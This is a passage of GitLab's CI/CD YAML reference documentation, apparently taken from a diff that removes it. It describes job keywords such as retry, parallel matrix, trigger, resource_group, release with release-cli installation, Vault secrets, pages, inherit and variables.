troubleshoot failing tests. - -For example, to upload artifacts only when a job fails: - -```yaml -job: - artifacts: - when: on_failure -``` - -### `coverage` - -Use `coverage` to configure how code coverage is extracted from the -job output. - -Regular expressions are the only valid kind of value expected here. So, using -surrounding `/` is mandatory to consistently and explicitly represent -a regular expression string. You must escape special characters if you want to -match them literally. - -For example: - -```yaml -job1: - script: rspec - coverage: '/Code coverage: \d+\.\d+/' -``` - -The coverage is shown in the UI if at least one line in the job output matches the regular expression. -If there is more than one matched line in the job output, the last line is used. -For the matched line, the first occurrence of `\d+(\.\d+)?` is the code coverage. -Leading zeros are removed. - -Coverage output from [child pipelines](../parent_child_pipelines.md) is not recorded -or displayed. Check [the related issue](https://gitlab.com/gitlab-org/gitlab/-/issues/280818) -for more details. - -### `retry` - -> [Introduced](https://gitlab.com/gitlab-org/gitlab-runner/-/issues/3515) in GitLab 11.5, you can control which failures to retry on. - -Use `retry` to configure how many times a job is retried in -case of a failure. - -When a job fails, the job is processed again, -until the limit specified by the `retry` keyword is reached. - -If `retry` is set to `2`, and a job succeeds in a second run (first retry), it is not retried. -The `retry` value must be a positive integer, from `0` to `2` -(two retries maximum, three runs in total). - -The following example retries all failure cases: - -```yaml -test: - script: rspec - retry: 2 -``` - -By default, a job is retried on all failure cases. To have better control -over which failures to retry, `retry` can be a hash with the following keys: - -- `max`: The maximum number of retries. -- `when`: The failure cases to retry. - -To retry only runner system failures at maximum two times: - -```yaml -test: - script: rspec - retry: - max: 2 - when: runner_system_failure -``` - -If there is another failure, other than a runner system failure, the job -is not retried. - -To retry on multiple failure cases, `when` can also be an array of failures: - -```yaml -test: - script: rspec - retry: - max: 2 - when: - - runner_system_failure - - stuck_or_timeout_failure -``` - -Possible values for `when` are: - -<!-- - If you change any of the values below, make sure to update the `RETRY_WHEN_IN_DOCUMENTATION` - array in `spec/lib/gitlab/ci/config/entry/retry_spec.rb`. - The test there makes sure that all documented - values are valid as a configuration option and therefore should always - stay in sync with this documentation. ---> - -- `always`: Retry on any failure (default). -- `unknown_failure`: Retry when the failure reason is unknown. -- `script_failure`: Retry when the script failed. -- `api_failure`: Retry on API failure. -- `stuck_or_timeout_failure`: Retry when the job got stuck or timed out. -- `runner_system_failure`: Retry if there is a runner system failure (for example, job setup failed). -- `missing_dependency_failure`: Retry if a dependency is missing. -- `runner_unsupported`: Retry if the runner is unsupported. -- `stale_schedule`: Retry if a delayed job could not be executed. -- `job_execution_timeout`: Retry if the script exceeded the maximum execution time set for the job. -- `archived_failure`: Retry if the job is archived and can't be run. -- `unmet_prerequisites`: Retry if the job failed to complete prerequisite tasks. -- `scheduler_failure`: Retry if the scheduler failed to assign the job to a runner. -- `data_integrity_failure`: Retry if there is a structural integrity problem detected. - -You can specify the number of [retry attempts for certain stages of job execution](../runners/configure_runners.md#job-stages-attempts) using variables. - -### `timeout` - -> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/14887) in GitLab 12.3. - -Use `timeout` to configure a timeout for a specific job. For example: - -```yaml -build: - script: build.sh - timeout: 3 hours 30 minutes - -test: - script: rspec - timeout: 3h 30m -``` - -The job-level timeout can exceed the -[project-level timeout](../pipelines/settings.md#timeout) but can't -exceed the runner-specific timeout. - -### `parallel` - -> [Introduced](https://gitlab.com/gitlab-org/gitlab-foss/-/issues/21480) in GitLab 11.5. - -Use `parallel` to configure how many instances of a job to run in parallel. -The value can be from 2 to 50. - -The `parallel` keyword creates N instances of the same job that run in parallel. -They are named sequentially from `job_name 1/N` to `job_name N/N`: - -```yaml -test: - script: rspec - parallel: 5 -``` - -Every parallel job has a `CI_NODE_INDEX` and `CI_NODE_TOTAL` -[predefined CI/CD variable](../variables/README.md#predefined-cicd-variables) set. - -Different languages and test suites have different methods to enable parallelization. -For example, use [Semaphore Test Boosters](https://github.com/renderedtext/test-boosters) -and RSpec to run Ruby tests in parallel: - -```ruby -# Gemfile -source 'https://rubygems.org' - -gem 'rspec' -gem 'semaphore_test_boosters' -``` - -```yaml -test: - parallel: 3 - script: - - bundle - - bundle exec rspec_booster --job $CI_NODE_INDEX/$CI_NODE_TOTAL -``` - -WARNING: -Test Boosters reports usage statistics to the author. - -You can then navigate to the **Jobs** tab of a new pipeline build and see your RSpec -job split into three separate jobs. - -#### Parallel `matrix` jobs - -> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/15356) in GitLab 13.3. - -Use `matrix:` to run a job multiple times in parallel in a single pipeline, -but with different variable values for each instance of the job. -There can be from 2 to 50 jobs. - -Jobs can only run in parallel if there are multiple runners, or a single runner is -[configured to run multiple jobs concurrently](#use-your-own-runners). - -Every job gets the same `CI_NODE_TOTAL` [CI/CD variable](../variables/README.md#predefined-cicd-variables) value, and a unique `CI_NODE_INDEX` value. - -```yaml -deploystacks: - stage: deploy - script: - - bin/deploy - parallel: - matrix: - - PROVIDER: aws - STACK: - - monitoring - - app1 - - app2 - - PROVIDER: ovh - STACK: [monitoring, backup, app] - - PROVIDER: [gcp, vultr] - STACK: [data, processing] -``` - -The following example generates 10 parallel `deploystacks` jobs, each with different values -for `PROVIDER` and `STACK`: - -```plaintext -deploystacks: [aws, monitoring] -deploystacks: [aws, app1] -deploystacks: [aws, app2] -deploystacks: [ovh, monitoring] -deploystacks: [ovh, backup] -deploystacks: [ovh, app] -deploystacks: [gcp, data] -deploystacks: [gcp, processing] -deploystacks: [vultr, data] -deploystacks: [vultr, processing] -``` - -The job naming style was [improved in GitLab 13.4](https://gitlab.com/gitlab-org/gitlab/-/issues/230452). - -##### One-dimensional `matrix` jobs - -> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/26362) in GitLab 13.5. - -You can also have one-dimensional matrices with a single job: - -```yaml -deploystacks: - stage: deploy - script: - - bin/deploy - parallel: - matrix: - - PROVIDER: [aws, ovh, gcp, vultr] -``` - -##### Parallel `matrix` trigger jobs - -> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/270957) in GitLab 13.10. - -Use `matrix:` to run a [trigger](#trigger) job multiple times in parallel in a single pipeline, -but with different variable values for each instance of the job. - -```yaml -deploystacks: - stage: deploy - trigger: - include: path/to/child-pipeline.yml - parallel: - matrix: - - PROVIDER: aws - STACK: [monitoring, app1] - - PROVIDER: ovh - STACK: [monitoring, backup] - - PROVIDER: [gcp, vultr] - STACK: [data] -``` - -This example generates 6 parallel `deploystacks` trigger jobs, each with different values -for `PROVIDER` and `STACK`, and they create 6 different child pipelines with those variables. - -```plaintext -deploystacks: [aws, monitoring] -deploystacks: [aws, app1] -deploystacks: [ovh, monitoring] -deploystacks: [ovh, backup] -deploystacks: [gcp, data] -deploystacks: [vultr, data] -``` - -### `trigger` - -> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/8997) in [GitLab Premium](https://about.gitlab.com/pricing/) 11.8. -> - [Moved](https://gitlab.com/gitlab-org/gitlab/-/issues/199224) to GitLab Free in 12.8. - -Use `trigger` to define a downstream pipeline trigger. When GitLab starts a `trigger` job, -a downstream pipeline is created. - -Jobs with `trigger` can only use a [limited set of keywords](../multi_project_pipelines.md#limitations). -For example, you can't run commands with [`script`](#script), [`before_script`](#before_script), -or [`after_script`](#after_script). - -You can use this keyword to create two different types of downstream pipelines: - -- [Multi-project pipelines](../multi_project_pipelines.md#creating-multi-project-pipelines-from-gitlab-ciyml) -- [Child pipelines](../parent_child_pipelines.md) - -[In GitLab 13.2](https://gitlab.com/gitlab-org/gitlab/-/issues/197140/) and later, you can -view which job triggered a downstream pipeline. In the [pipeline graph](../pipelines/index.md#visualize-pipelines), -hover over the downstream pipeline job. - -In [GitLab 13.5](https://gitlab.com/gitlab-org/gitlab/-/issues/201938) and later, you -can use [`when:manual`](#whenmanual) in the same job as `trigger`. In GitLab 13.4 and -earlier, using them together causes the error `jobs:#{job-name} when should be on_success, on_failure or always`. -You [cannot start `manual` trigger jobs with the API](https://gitlab.com/gitlab-org/gitlab/-/issues/284086). - -#### Basic `trigger` syntax for multi-project pipelines - -You can configure a downstream trigger by using the `trigger` keyword -with a full path to a downstream project: - -```yaml -rspec: - stage: test - script: bundle exec rspec - -staging: - stage: deploy - trigger: my/deployment -``` - -#### Complex `trigger` syntax for multi-project pipelines - -You can configure a branch name that GitLab uses to create -a downstream pipeline with: - -```yaml -rspec: - stage: test - script: bundle exec rspec - -staging: - stage: deploy - trigger: - project: my/deployment - branch: stable -``` - -To mirror the status from a triggered pipeline: - -```yaml -trigger_job: - trigger: - project: my/project - strategy: depend -``` - -To mirror the status from an upstream pipeline: - -```yaml -upstream_bridge: - stage: test - needs: - pipeline: other/project -``` - -#### `trigger` syntax for child pipeline - -> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/16094) in GitLab 12.7. - -To create a [child pipeline](../parent_child_pipelines.md), specify the path to the -YAML file that contains the configuration of the child pipeline: - -```yaml -trigger_job: - trigger: - include: path/to/child-pipeline.yml -``` - -Similar to [multi-project pipelines](../multi_project_pipelines.md#mirroring-status-from-triggered-pipeline), -it's possible to mirror the status from a triggered pipeline: - -```yaml -trigger_job: - trigger: - include: - - local: path/to/child-pipeline.yml - strategy: depend -``` - -##### Trigger child pipeline with generated configuration file - -> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/35632) in GitLab 12.9. - -You can also trigger a child pipeline from a [dynamically generated configuration file](../parent_child_pipelines.md#dynamic-child-pipelines): - -```yaml -generate-config: - stage: build - script: generate-ci-config > generated-config.yml - artifacts: - paths: - - generated-config.yml - -child-pipeline: - stage: test - trigger: - include: - - artifact: generated-config.yml - job: generate-config -``` - -The `generated-config.yml` is extracted from the artifacts and used as the configuration -for triggering the child pipeline. - -##### Trigger child pipeline with files from another project - -> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/205157) in GitLab 13.5. - -To trigger child pipelines with files from another private project under the same -GitLab instance, use [`include:file`](#includefile): - -```yaml -child-pipeline: - trigger: - include: - - project: 'my-group/my-pipeline-library' - ref: 'main' - file: '/path/to/child-pipeline.yml' -``` - -#### Linking pipelines with `trigger:strategy` - -By default, the `trigger` job completes with the `success` status -as soon as the downstream pipeline is created. - -To force the `trigger` job to wait for the downstream (multi-project or child) pipeline to complete, use -`strategy: depend`. This setting makes the trigger job wait with a "running" status until the triggered -pipeline completes. At that point, the `trigger` job completes and displays the same status as -the downstream job. - -This setting can help keep your pipeline execution linear. In the following example, jobs from -subsequent stages wait for the triggered pipeline to successfully complete before -starting, which reduces parallelization. - -```yaml -trigger_job: - trigger: - include: path/to/child-pipeline.yml - strategy: depend -``` - -#### Trigger a pipeline by API call - -To force a rebuild of a specific branch, tag, or commit, you can use an API call -with a trigger token. - -The trigger token is different than the [`trigger`](#trigger) keyword. - -[Read more in the triggers documentation.](../triggers/README.md) - -### `interruptible` - -> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/32022) in GitLab 12.3. - -Use `interruptible` to indicate that a running job should be canceled if made redundant by a newer pipeline run. -Defaults to `false` (uninterruptible). Jobs that have not started yet (pending) are considered interruptible -and safe to be cancelled. -This value is used only if the [automatic cancellation of redundant pipelines feature](../pipelines/settings.md#auto-cancel-redundant-pipelines) -is enabled. - -When enabled, a pipeline is immediately canceled when a new pipeline starts on the same branch if either of the following is true: - -- All jobs in the pipeline are set as interruptible. -- Any uninterruptible jobs have not started yet. - -Set jobs as interruptible that can be safely canceled once started (for instance, a build job). - -In the following example, a new pipeline run causes an existing running pipeline to be: - -- Canceled, if only `step-1` is running or pending. -- Not canceled, once `step-2` starts running. - -After an uninterruptible job starts running, the pipeline cannot be canceled. - -```yaml -stages: - - stage1 - - stage2 - - stage3 - -step-1: - stage: stage1 - script: - - echo "Can be canceled." - interruptible: true - -step-2: - stage: stage2 - script: - - echo "Can not be canceled." - -step-3: - stage: stage3 - script: - - echo "Because step-2 can not be canceled, this step can never be canceled, even though it's set as interruptible." - interruptible: true -``` - -### `resource_group` - -> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/15536) in GitLab 12.7. - -Sometimes running multiple jobs or pipelines at the same time in an environment -can lead to errors during the deployment. - -To avoid these errors, use the `resource_group` attribute to make sure that -the runner doesn't run certain jobs simultaneously. Resource groups behave similar -to semaphores in other programming languages. - -When the `resource_group` keyword is defined for a job in the `.gitlab-ci.yml` file, -job executions are mutually exclusive across different pipelines for the same project. -If multiple jobs belonging to the same resource group are enqueued simultaneously, -only one of the jobs is picked by the runner. The other jobs wait until the -`resource_group` is free. - -For example: - -```yaml -deploy-to-production: - script: deploy - resource_group: production -``` - -In this case, two `deploy-to-production` jobs in two separate pipelines can never run at the same time. As a result, -you can ensure that concurrent deployments never happen to the production environment. - -You can define multiple resource groups per environment. For example, -when deploying to physical devices, you may have multiple physical devices. Each device -can be deployed to, but there can be only one deployment per device at any given time. - -The `resource_group` value can only contain letters, digits, `-`, `_`, `/`, `$`, `{`, `}`, `.`, and spaces. -It can't start or end with `/`. - -For more information, see [Deployments Safety](../environments/deployment_safety.md). - -#### Pipeline-level concurrency control with Cross-Project/Parent-Child pipelines - -> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/39057) in GitLab 13.9. - -You can define `resource_group` for downstream pipelines that are sensitive to concurrent -executions. The [`trigger` keyword](#trigger) can trigger downstream pipelines. The -[`resource_group` keyword](#resource_group) can co-exist with it. This is useful to control the -concurrency for deployment pipelines, while running non-sensitive jobs concurrently. - -The following example has two pipeline configurations in a project. When a pipeline starts running, -non-sensitive jobs are executed first and aren't affected by concurrent executions in other -pipelines. However, GitLab ensures that there are no other deployment pipelines running before -triggering a deployment (child) pipeline. If other deployment pipelines are running, GitLab waits -until those pipelines finish before running another one. - -```yaml -# .gitlab-ci.yml (parent pipeline) - -build: - stage: build - script: echo "Building..." - -test: - stage: test - script: echo "Testing..." - -deploy: - stage: deploy - trigger: - include: deploy.gitlab-ci.yml - strategy: depend - resource_group: AWS-production -``` - -```yaml -# deploy.gitlab-ci.yml (child pipeline) - -stages: - - provision - - deploy - -provision: - stage: provision - script: echo "Provisioning..." - -deployment: - stage: deploy - script: echo "Deploying..." -``` - -You must define [`strategy: depend`](#linking-pipelines-with-triggerstrategy) -with the `trigger` keyword. This ensures that the lock isn't released until the downstream pipeline -finishes. - -### `release` - -> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/19298) in GitLab 13.2. - -Use `release` to create a [release](../../user/project/releases/index.md). -Requires the [`release-cli`](https://gitlab.com/gitlab-org/release-cli/-/tree/master/docs) -to be available in your GitLab Runner Docker or shell executor. - -These keywords are supported: - -- [`tag_name`](#releasetag_name) -- [`description`](#releasedescription) -- [`name`](#releasename) (optional) -- [`ref`](#releaseref) (optional) -- [`milestones`](#releasemilestones) (optional) -- [`released_at`](#releasereleased_at) (optional) -- [`assets:links`](#releaseassetslinks) (optional) - -The release is created only if the job processes without error. If the Rails API -returns an error during release creation, the `release` job fails. - -#### `release-cli` Docker image - -You must specify the Docker image to use for the `release-cli`: - -```yaml -image: registry.gitlab.com/gitlab-org/release-cli:latest -``` - -#### `release-cli` for shell executors - -> [Introduced](https://gitlab.com/gitlab-org/release-cli/-/issues/21) in GitLab 13.8. - -For GitLab Runner shell executors, you can download and install the `release-cli` manually for your [supported OS and architecture](https://release-cli-downloads.s3.amazonaws.com/latest/index.html). -Once installed, the `release` keyword should be available to you. - -**Install on Unix/Linux** - -1. Download the binary for your system, in the following example for amd64 systems: - - ```shell - curl --location --output /usr/local/bin/release-cli "https://release-cli-downloads.s3.amazonaws.com/latest/release-cli-linux-amd64" - ``` - -1. Give it permissions to execute: - - ```shell - sudo chmod +x /usr/local/bin/release-cli - ``` - -1. Verify `release-cli` is available: - - ```shell - $ release-cli -v - - release-cli version 0.6.0 - ``` - -**Install on Windows PowerShell** - -1. Create a folder somewhere in your system, for example `C:\GitLab\Release-CLI\bin` - - ```shell - New-Item -Path 'C:\GitLab\Release-CLI\bin' -ItemType Directory - ``` - -1. Download the executable file: - - ```shell - PS C:\> Invoke-WebRequest -Uri "https://release-cli-downloads.s3.amazonaws.com/latest/release-cli-windows-amd64.exe" -OutFile "C:\GitLab\Release-CLI\bin\release-cli.exe" - - Directory: C:\GitLab\Release-CLI - Mode LastWriteTime Length Name - ---- ------------- ------ ---- - d----- 3/16/2021 4:17 AM bin - - ``` - -1. Add the directory to your `$env:PATH`: - - ```shell - $env:PATH += ";C:\GitLab\Release-CLI\bin" - ``` - -1. Verify `release-cli` is available: - - ```shell - PS C:\> release-cli -v - - release-cli version 0.6.0 - ``` - -#### Use a custom SSL CA certificate authority - -You can use the `ADDITIONAL_CA_CERT_BUNDLE` CI/CD variable to configure a custom SSL CA certificate authority, -which is used to verify the peer when the `release-cli` creates a release through the API using HTTPS with custom certificates. -The `ADDITIONAL_CA_CERT_BUNDLE` value should contain the -[text representation of the X.509 PEM public-key certificate](https://tools.ietf.org/html/rfc7468#section-5.1) -or the `path/to/file` containing the certificate authority. -For example, to configure this value in the `.gitlab-ci.yml` file, use the following: - -```yaml -release: - variables: - ADDITIONAL_CA_CERT_BUNDLE: | - -----BEGIN CERTIFICATE----- - MIIGqTCCBJGgAwIBAgIQI7AVxxVwg2kch4d56XNdDjANBgkqhkiG9w0BAQsFADCB - ... - jWgmPqF3vUbZE0EyScetPJquRFRKIesyJuBFMAs= - -----END CERTIFICATE----- - script: - - echo "Create release" - release: - name: 'My awesome release' - tag_name: '$CI_COMMIT_TAG' -``` - -The `ADDITIONAL_CA_CERT_BUNDLE` value can also be configured as a -[custom variable in the UI](../variables/README.md#custom-cicd-variables), -either as a `file`, which requires the path to the certificate, or as a variable, -which requires the text representation of the certificate. - -#### `script` - -All jobs except [trigger](#trigger) jobs must have the `script` keyword. A `release` -job can use the output from script commands, but you can use a placeholder script if -the script is not needed: - -```yaml -script: - - echo 'release job' -``` - -An [issue](https://gitlab.com/gitlab-org/gitlab/-/issues/223856) exists to remove this requirement in an upcoming version of GitLab. - -A pipeline can have multiple `release` jobs, for example: - -```yaml -ios-release: - script: - - echo 'iOS release job' - release: - tag_name: v1.0.0-ios - description: 'iOS release v1.0.0' - -android-release: - script: - - echo 'Android release job' - release: - tag_name: v1.0.0-android - description: 'Android release v1.0.0' -``` - -#### `release:tag_name` - -You must specify a `tag_name` for the release. The tag can refer to an existing Git tag or -you can specify a new tag. - -When the specified tag doesn't exist in the repository, a new tag is created from the associated SHA of the pipeline. - -For example, when creating a release from a Git tag: - -```yaml -job: - release: - tag_name: $CI_COMMIT_TAG - description: 'Release description' -``` - -It is also possible for the release job to automatically create a new unique tag. In that case, -do not use [`rules`](#rules) or [`only`](#only--except) to configure the job to -only run for tags. - -A semantic versioning example: - -```yaml -job: - release: - tag_name: ${MAJOR}_${MINOR}_${REVISION} - description: 'Release description' -``` - -- The release is created only if the job's main script succeeds. -- If the release already exists, it is not updated and the job with the `release` keyword fails. -- The `release` section executes after the `script` tag and before the `after_script`. - -#### `release:name` - -The release name. If omitted, it is populated with the value of `release: tag_name`. - -#### `release:description` - -Specifies the long description of the release. You can also specify a file that contains the -description. - -##### Read description from a file - -> [Introduced](https://gitlab.com/gitlab-org/release-cli/-/merge_requests/67) in GitLab 13.7. - -You can specify a file in `$CI_PROJECT_DIR` that contains the description. The file must be relative -to the project directory (`$CI_PROJECT_DIR`), and if the file is a symbolic link it can't reside -outside of `$CI_PROJECT_DIR`. The `./path/to/file` and filename can't contain spaces. - -```yaml -job: - release: - tag_name: ${MAJOR}_${MINOR}_${REVISION} - description: './path/to/CHANGELOG.md' -``` - -#### `release:ref` - -If the `release: tag_name` doesn't exist yet, the release is created from `ref`. -`ref` can be a commit SHA, another tag name, or a branch name. - -#### `release:milestones` - -The title of each milestone the release is associated with. - -#### `release:released_at` - -The date and time when the release is ready. Defaults to the current date and time if not -defined. Should be enclosed in quotes and expressed in ISO 8601 format. - -```json -released_at: '2021-03-15T08:00:00Z' -``` - -#### `release:assets:links` - -> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/271454) in GitLab 13.12. - -Include [asset links](../../user/project/releases/index.md#release-assets) in the release. - -NOTE: -Requires `release-cli` version v0.4.0 or higher. - -```yaml -assets: - links: - - name: 'asset1' - url: 'https://example.com/assets/1' - - name: 'asset2' - url: 'https://example.com/assets/2' - filepath: '/pretty/url/1' # optional - link_type: 'other' # optional -``` - -#### Complete example for `release` - -If you combine the previous examples for `release`, you get two options, depending on how you generate the -tags. You can't use these options together, so choose one: - -- To create a release when you push a Git tag, or when you add a Git tag - in the UI by going to **Repository > Tags**: - - ```yaml - release_job: - stage: release - image: registry.gitlab.com/gitlab-org/release-cli:latest - rules: - - if: $CI_COMMIT_TAG # Run this job when a tag is created manually - script: - - echo 'running release_job' - release: - name: 'Release $CI_COMMIT_TAG' - description: 'Created using the release-cli $EXTRA_DESCRIPTION' # $EXTRA_DESCRIPTION must be defined - tag_name: '$CI_COMMIT_TAG' # elsewhere in the pipeline. - ref: '$CI_COMMIT_TAG' - milestones: - - 'm1' - - 'm2' - - 'm3' - released_at: '2020-07-15T08:00:00Z' # Optional, is auto generated if not defined, or can use a variable. - assets: # Optional, multiple asset links - links: - - name: 'asset1' - url: 'https://example.com/assets/1' - - name: 'asset2' - url: 'https://example.com/assets/2' - filepath: '/pretty/url/1' # optional - link_type: 'other' # optional - ``` - -- To create a release automatically when commits are pushed or merged to the default branch, - using a new Git tag that is defined with variables: - - NOTE: - Environment variables set in `before_script` or `script` are not available for expanding - in the same job. Read more about - [potentially making variables available for expanding](https://gitlab.com/gitlab-org/gitlab-runner/-/issues/6400). - - ```yaml - prepare_job: - stage: prepare # This stage must run before the release stage - rules: - - if: $CI_COMMIT_TAG - when: never # Do not run this job when a tag is created manually - - if: $CI_COMMIT_BRANCH == $CI_DEFAULT_BRANCH # Run this job when commits are pushed or merged to the default branch - script: - - echo "EXTRA_DESCRIPTION=some message" >> variables.env # Generate the EXTRA_DESCRIPTION and TAG environment variables - - echo "TAG=v$(cat VERSION)" >> variables.env # and append to the variables.env file - artifacts: - reports: - dotenv: variables.env # Use artifacts:reports:dotenv to expose the variables to other jobs - - release_job: - stage: release - image: registry.gitlab.com/gitlab-org/release-cli:latest - needs: - - job: prepare_job - artifacts: true - rules: - - if: $CI_COMMIT_TAG - when: never # Do not run this job when a tag is created manually - - if: $CI_COMMIT_BRANCH == $CI_DEFAULT_BRANCH # Run this job when commits are pushed or merged to the default branch - script: - - echo 'running release_job for $TAG' - release: - name: 'Release $TAG' - description: 'Created using the release-cli $EXTRA_DESCRIPTION' # $EXTRA_DESCRIPTION and the $TAG - tag_name: '$TAG' # variables must be defined elsewhere - ref: '$CI_COMMIT_SHA' # in the pipeline. For example, in the - milestones: # prepare_job - - 'm1' - - 'm2' - - 'm3' - released_at: '2020-07-15T08:00:00Z' # Optional, is auto generated if not defined, or can use a variable. - assets: - links: - - name: 'asset1' - url: 'https://example.com/assets/1' - - name: 'asset2' - url: 'https://example.com/assets/2' - filepath: '/pretty/url/1' # optional - link_type: 'other' # optional - ``` - -#### Release assets as Generic packages - -You can use [Generic packages](../../user/packages/generic_packages/) to host your release assets. -For a complete example, see the [Release assets as Generic packages](https://gitlab.com/gitlab-org/release-cli/-/tree/master/docs/examples/release-assets-as-generic-package/) -project. - -#### `release-cli` command line - -The entries under the `release` node are transformed into a `bash` command line and sent -to the Docker container, which contains the [release-cli](https://gitlab.com/gitlab-org/release-cli). -You can also call the `release-cli` directly from a `script` entry. - -For example, if you use the YAML described previously: - -```shell -release-cli create --name "Release $CI_COMMIT_SHA" --description "Created using the release-cli $EXTRA_DESCRIPTION" --tag-name "v${MAJOR}.${MINOR}.${REVISION}" --ref "$CI_COMMIT_SHA" --released-at "2020-07-15T08:00:00Z" --milestone "m1" --milestone "m2" --milestone "m3" --assets-link "{\"name\":\"asset1\",\"url\":\"https://example.com/assets/1\",\"link_type\":\"other\"} -``` - -### `secrets` - -> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/33014) in GitLab 13.4. - -Use `secrets` to specify the [CI/CD Secrets](../secrets/index.md) the job needs. It should be a hash, -and the keys should be the names of the variables that are made available to the job. -The value of each secret is saved in a temporary file. This file's path is stored in these -variables. - -#### `secrets:vault` **(PREMIUM)** - -> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/28321) in GitLab 13.4. - -Use `vault` to specify secrets provided by [Hashicorp's Vault](https://www.vaultproject.io/). - -This syntax has multiple forms. The shortest form assumes the use of the -[KV-V2](https://www.vaultproject.io/docs/secrets/kv/kv-v2) secrets engine, -mounted at the default path `kv-v2`. The last part of the secret's path is the -field to fetch the value for: - -```yaml -job: - secrets: - DATABASE_PASSWORD: - vault: production/db/password # translates to secret `kv-v2/data/production/db`, field `password` -``` - -You can specify a custom secrets engine path by adding a suffix starting with `@`: - -```yaml -job: - secrets: - DATABASE_PASSWORD: - vault: production/db/password@ops # translates to secret `ops/data/production/db`, field `password` -``` - -In the detailed form of the syntax, you can specify all details explicitly: - -```yaml -job: - secrets: - DATABASE_PASSWORD: # translates to secret `ops/data/production/db`, field `password` - vault: - engine: - name: kv-v2 - path: ops - path: production/db - field: password -``` - -### `pages` - -Use `pages` to upload static content to GitLab. The content -is then published as a website. You must: - -- Place any static content in a `public/` directory. -- Define [`artifacts`](#artifacts) with a path to the `public/` directory. - -The following example moves all files from the root of the project to the -`public/` directory. The `.public` workaround is so `cp` does not also copy -`public/` to itself in an infinite loop: - -```yaml -pages: - stage: deploy - script: - - mkdir .public - - cp -r * .public - - mv .public public - artifacts: - paths: - - public - rules: - - if: $CI_COMMIT_BRANCH == $CI_DEFAULT_BRANCH -``` - -View the [GitLab Pages user documentation](../../user/project/pages/index.md). - -### `inherit` - -> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/207484) in GitLab 12.9. - -Use `inherit:` to control inheritance of globally-defined defaults -and variables. - -To enable or disable the inheritance of all `default:` or `variables:` keywords, use: - -- `default: true` or `default: false` -- `variables: true` or `variables: false` - -To inherit only a subset of `default:` keywords or `variables:`, specify what -you wish to inherit. Anything not listed is **not** inherited. Use -one of the following formats: - -```yaml -inherit: - default: [keyword1, keyword2] - variables: [VARIABLE1, VARIABLE2] -``` - -Or: - -```yaml -inherit: - default: - - keyword1 - - keyword2 - variables: - - VARIABLE1 - - VARIABLE2 -``` - -In the following example: - -- `rubocop`: - - inherits: Nothing. -- `rspec`: - - inherits: the default `image` and the `WEBHOOK_URL` variable. - - does **not** inherit: the default `before_script` and the `DOMAIN` variable. -- `capybara`: - - inherits: the default `before_script` and `image`. - - does **not** inherit: the `DOMAIN` and `WEBHOOK_URL` variables. -- `karma`: - - inherits: the default `image` and `before_script`, and the `DOMAIN` variable. - - does **not** inherit: `WEBHOOK_URL` variable. - -```yaml -default: - image: 'ruby:2.4' - before_script: - - echo Hello World - -variables: - DOMAIN: example.com - WEBHOOK_URL: https://my-webhook.example.com - -rubocop: - inherit: - default: false - variables: false - script: bundle exec rubocop - -rspec: - inherit: - default: [image] - variables: [WEBHOOK_URL] - script: bundle exec rspec - -capybara: - inherit: - variables: false - script: bundle exec capybara - -karma: - inherit: - default: true - variables: [DOMAIN] - script: karma -``` - -## `variables` - -> Introduced in GitLab Runner v0.5.0. - -[CI/CD variables](../variables/README.md) are configurable values that are passed to jobs. -They can be set globally and per-job. - -There are two types of variables. - -- [Custom variables](../variables/README.md#custom-cicd-variables): - You can define their values in the `.gitlab-ci.yml` file, in the GitLab UI, - or by using the API. You can also input variables in the GitLab UI when - [running a pipeline manually](../pipelines/index.md#run-a-pipeline-manually). -- [Predefined variables](../variables/predefined_variables.md): - These values are set by the runner itself. - One example is `CI_COMMIT_REF_NAME`, which is the branch or tag the project is built for. - -After you define a variable, you can use it in all executed commands and scripts. - -Variables are meant for non-sensitive project configuration, for example: - -```yaml -variables: - DEPLOY_SITE: "https://example.com/" - -deploy_job: - stage: deploy - script: - - deploy-script --url $DEPLOY_SITE --path "/" - -deploy_review_job: - stage: deploy - variables: - REVIEW_PATH: "/review" - script: - - deploy-review-script --url $DEPLOY_SITE --path $REVIEW_PATH -``` - -You can use only integers and strings for the variable's name and value. - -If you define a variable at the top level of the `gitlab-ci.yml` file, it is global, -meaning it applies to all jobs. If you define a variable in a job, it's available -to that job only. - -If a variable of the same name is defined globally and for a specific job, the -[job-specific variable overrides the global variable](../variables/README.md#cicd-variable-precedence). - -All YAML-defined variables are also set to any linked -[Docker service containers](../services/index.md). - -You can use [YAML anchors for variables](#yaml-anchors-for-variables). - -### Prefill variables in manual pipelines - -> [Introduced in](https://gitlab.com/gitlab-org/gitlab/-/issues/30101) GitLab 13.7. - -Use the `value` and `description` keywords to define [pipeline-level (global) variables that are prefilled](../pipelines/index.md#prefill-variables-in-manual-pipelines) -when [running a pipeline manually](../pipelines/index.md#run-a-pipeline-manually): - -```yaml -variables: - DEPLOY_ENVIRONMENT: - value: "staging" # Deploy to staging by default - description: "The deployment target. Change this variable to 'canary' or 'production' if needed." -``` - -You cannot set job-level variables to be pre-filled when you run a pipeline manually. - -### Configure runner behavior with variables - -You can use [CI/CD variables](../variables/README.md) to configure how the runner processes Git requests: - -- [`GIT_STRATEGY`](../runners/configure_runners.md#git-strategy) -- [`GIT_SUBMODULE_STRATEGY`](../runners/configure_runners.md#git-submodule-strategy) -- [`GIT_CHECKOUT`](../runners/configure_runners.md#git-checkout) -- [`GIT_CLEAN_FLAGS`](../runners/configure_runners.md#git-clean-flags) -- [`GIT_FETCH_EXTRA_FLAGS`](../runners/configure_runners.md#git-fetch-extra-flags) -- [`GIT_DEPTH`](../runners/configure_runners.md#shallow-cloning) (shallow cloning) -- [`GIT_CLONE_PATH`](../runners/configure_runners.md#custom-build-directories) (custom build directories) -- 